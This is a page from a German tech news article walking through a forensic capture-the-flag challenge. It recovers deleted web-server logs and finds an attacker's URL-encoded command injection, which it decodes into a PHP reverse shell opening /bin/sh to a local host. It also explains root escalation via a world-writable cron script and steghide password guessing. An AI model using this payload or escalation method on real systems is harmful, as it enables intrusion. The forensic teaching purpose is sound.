Abo
  • Services:
Anzeige
Bezahlung nach TVöD Bund in der Entgeltgruppe 14 und eine tarifliche Sonderzulage von 400 Euro monatlich: Wie wär's mit einem Job beim BND?
Bezahlung nach TVöD Bund in der Entgeltgruppe 14 und eine tarifliche Sonderzulage von 400 Euro monatlich: Wie wär's mit einem Job beim BND? (Bild: BND/Screenshot: Golem.de)

Remote-Shell in gelöschter Webserver-Logdatei

Die Logdatei des Webservers wurde vom Hacker bereinigt. Wir finden dort lediglich einige Cross-Site-Scripting-Versuche und eine Eingabe einer langen Zeichenkette von As, die wohl den Buffer Overflow auslöst, aber keinen Angriffsversuch darstellt und lediglich zu einem Absturz führen dürfte. Allerdings wissen wir natürlich, dass gelöschte Daten oftmals nicht wirklich gelöscht sind. Um möglicherweise gelöschte Logdaten zu finden, schauen wir uns die Partition selbst an. Das machen wir außerhalb der virtuellen Maschine. Die Partitionen in einer vmdk-Datei lassen sich mit dem Programm 7-Zip extrahieren. Wir erhalten eine SWAP-Partition und ein EXT4-Dateisystem. Das Dateisystem durchsuchen wir mittels strings und grep nach der Zeichenkette GET.

Anzeige

Wir finden tatsächlich einige weitere Logeinträge, die uns Aufschluss über den Angriff geben. Spannend sind Einträge dieser Form:

192.168.1.11 - - [23/Nov/2016:10:13:32 +0100] "GET /originalIndex.php?password=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA& file=;%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d %66%73%6f%63%6b%6f%70%65%6e%28%22%31%39%32%2e%31 %36%38%2e%31%2e%31%31%22%2c%31%32%33%34%29%3b%65 %78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20 %3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27 HTTP/1.1" 200 1991 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"

Die Prozentzeichen sind URL-codiert, wir verwenden PHP, um diese zu decodieren, beispielsweise auf der Kommandozeile mit php -r echo(urldecode([eingabe]));). Das Ergebnis:

  1. php -r
  2. '$sock=fsockopen("192.168.1.11",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Der Angreifer nutzt hier PHP, um eine Remote-Shell aufzumachen. Über den Port 1234 kann er anschließend in das System eindringen. Etwas überrascht sind wir über die IP-Adresse. Es handelt sich sowohl im Log als auch in der Remote-Shell um eine lokale IP, die eigentlich von außen nicht zugänglich sein dürfte. Der Angreifer muss sich also im lokalen Netz befinden oder wir haben es mit einer ungewöhnlichen Portforwarding-Konstruktion zu tun. Da wir über das Netzwerk jedoch keine weiteren Informationen haben, können wir hier nicht weiterforschen.

Was liegt unter /home/root?

Wie wurde der Angreifer aber zum Root-Nutzer? Hier müssen wir eine Weile rätseln. Wir finden ein Verzeichnis /home/root mit diesen ungewöhnlichen Berechtigungen: drwx---r--. Das Verzeichnis hat also Leserechte für alle Nutzer. Darin finden wir eine Datei root_pw und eine Datei Rul0rzZrootPw.

In Rul0rzZrootPw finden wir das aktuelle Root-Passwort (JDWbwz334aawefHHwf/)2). Wir vermuten zunächst, dass die Datei root_pw das originale Root-Passwort (2Has21sjJ0w3/?dee82H) enthält und dort bereits vorher lag. Die seltsame Leseberechtigung erlaubt allerdings keinen Lesezugriff auf die Datei. Sie ermöglicht es uns lediglich, den Inhalt des Verzeichnisses anzuzeigen. Wir können als Nutzer die Dateien darin nicht auslesen.

Letztendlich finden wir die mutmaßliche Lösung woanders: Es existiert ein Cronjob des Root-Nutzers, der regelmäßig ein Skript mit dem Namen doAlwaysCron.sh ausführt. Dieses Skript lässt sich von allen Nutzern lesen und schreiben. Somit kann der Nutzer www-data dort eigene Befehle einfügen. Sie werden kurze Zeit später mit Root-Rechten ausgeführt.

Wir finden weiterhin noch ein Verzeichnis hackedData im home-Verzeichnis. Darin gibt es zwei Dateien flagImage.jpg und hackedPasswords.txt. Das Bild flagImage.jpg zeigt uns den Text "You are close! However, this is not the flag! Maybe you should look a bit closer... :-)".

Einen Hinweis, was es mit diesem Rätsel auf sich hat, finden wir in der Bash-History des Root-Nutzers. Dort wird der Befehl steghide ausgeführt. Dabei handelt es sich um ein Programm, das Nachrichten passwortgeschützt in Bildern versteckt. Wir analysieren die Datei außerhalb des Images und stehen vor einem Problem: steghide wird nicht mehr weiterentwickelt und lässt sich auf einem modernen System mit aktuellem gcc-Compiler nicht kompilieren. Allerdings finden wir einen Patch, der uns weiterhilft. Wir probieren mit einer Schleife alle Passwörter aus hackedPasswords.txt aus. gr3at3stH4xX0rAl1ve!1 ist das richtige Passwort und wir erhalten folgende Lösung:

  1. You solved the challenge!
  2. Here is your nugget <@:-)
  3.  
  4. H4CK1NG_1S_RE4LY_4WESOM3!

 Script-Injection in PHP-WebseiteGab es einen Inside-Hacker? 

eye home zur Startseite
Loading... 05. Mai 2017

Mag ja solche Challenges und würde sie gerne, wie vorgesehen lösen, also nicht über den...

digidax 05. Apr 2017

In welcher Datei wurde der Logeintrag: 192.168.1.11 - - [23/Nov/2016:10:13:32 +0100...

N3X 04. Apr 2017

Hallo Golem Team, ihr schreibt, dass es für einen Angreifer nicht möglich sei zu...

N3X 03. Apr 2017

hat hiermit recht wenig zu tun. Schau dir mal die VM an, und wie die Auth. abläuft. Du...

ClausWARE 21. Mär 2017

Also das Fazit am ende ließt sich nicht gerade wie Wrbung für den BND.



Anzeige

Stellenmarkt
  1. ZytoService Deutschland GmbH, Hamburg
  2. W&W Asset Management GmbH, Ludwigsburg
  3. SYNLAB Holding Deutschland GmbH, München, Augsburg
  4. CEMA AG, verschiedene Standorte


Anzeige
Blu-ray-Angebote
  1. 1 Monat für 1€
  2. 299,99€ (Vorbesteller-Preisgarantie)
  3. Einzelne Folge für 2,99€ oder ganze Staffel für 19,99€ kaufen (Amazon Video)

Folgen Sie uns
       


  1. Spieleklassiker

    Mafia digital bei GoG erhältlich

  2. Air-Berlin-Insolvenz

    Bundesbeamte müssen videotelefonieren statt zu fliegen

  3. Fraport

    Autonomer Bus im dichten Verkehr auf dem Flughafen

  4. Mixed Reality

    Microsoft verdoppelt Sichtfeld der Hololens

  5. Nvidia

    Shield TV ohne Controller kostet 200 Euro

  6. Die Woche im Video

    Wegen Krack wie auf Crack!

  7. Windows 10

    Fall Creators Update macht Ryzen schneller

  8. Gesundheitskarte

    T-Systems will Konnektor bald ausliefern

  9. Galaxy Tab Active 2

    Samsungs neues Ruggedized-Tablet kommt mit S-Pen

  10. Jaxa

    Japanische Forscher finden riesige Höhle im Mond



Haben wir etwas übersehen?

E-Mail an news@golem.de


Anzeige
Krack-Angriff: Kein Grund zur Panik
Krack-Angriff
Kein Grund zur Panik
  1. Neue WLAN-Treiber Intel muss WLAN und AMT-Management gegen Krack patchen
  2. Ubiquiti Amplifi und Unifi Erster Consumer-WLAN-Router wird gegen Krack gepatcht
  3. Krack WPA2 ist kaputt, aber nicht gebrochen

Flettner-Rotoren: Wie Schiffe mit Stahlsegeln Treibstoff sparen
Flettner-Rotoren
Wie Schiffe mit Stahlsegeln Treibstoff sparen
  1. Hyperflight China plant superschnellen Vactrain
  2. Sea Bubbles Tragflächen-Elektroboote kommen nach Paris
  3. Honolulu Strafe für Handynutzung auf der Straße

Cybercrime: Neun Jahre Jagd auf Bayrob
Cybercrime
Neun Jahre Jagd auf Bayrob
  1. Antivirus Symantec will keine Code-Reviews durch Regierungen mehr
  2. Verschlüsselung Google schmeißt Symantec aus Chrome raus
  3. Übernahme Digicert kauft Zertifikatssparte von Symantec

  1. Re: 1. Win10 Bluescreen nach Update

    HubertHans | 01:27

  2. Re: Guter Trend auf Golem

    FreiGeistler | 01:09

  3. Re: Leider verpennt

    quineloe | 01:06

  4. Re: "Es sei nicht einzusehen, dass Netflix an die...

    Der Held vom... | 01:00

  5. Re: Gefunden...

    FreiGeistler | 00:20


  1. 17:14

  2. 16:25

  3. 15:34

  4. 13:05

  5. 11:59

  6. 09:03

  7. 22:38

  8. 18:00


  1. Themen
  2. A
  3. B
  4. C
  5. D
  6. E
  7. F
  8. G
  9. H
  10. I
  11. J
  12. K
  13. L
  14. M
  15. N
  16. O
  17. P
  18. Q
  19. R
  20. S
  21. T
  22. U
  23. V
  24. W
  25. X
  26. Y
  27. Z
  28. #
 
    •  / 
    Zum Artikel